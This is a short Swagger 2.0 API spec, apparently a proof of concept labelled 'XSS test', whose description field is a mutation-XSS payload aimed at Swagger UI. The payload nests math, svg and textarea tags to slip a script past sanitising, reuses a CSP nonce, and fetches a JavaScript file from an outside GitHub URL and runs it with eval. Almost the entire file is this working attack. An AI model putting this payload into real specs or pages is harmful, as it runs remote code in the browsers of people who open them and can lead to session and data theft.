swagger: '2.0'
info:
  title: <h1>XSS test</h1>
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><script nonce='TkB4bEAwTzk='>fetch(`https://raw.githubusercontent.com/shehzadali313/swagger-ui-xss/main/script.js`).then(function(res){res.text().then(function(data){eval(data)})})</script></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
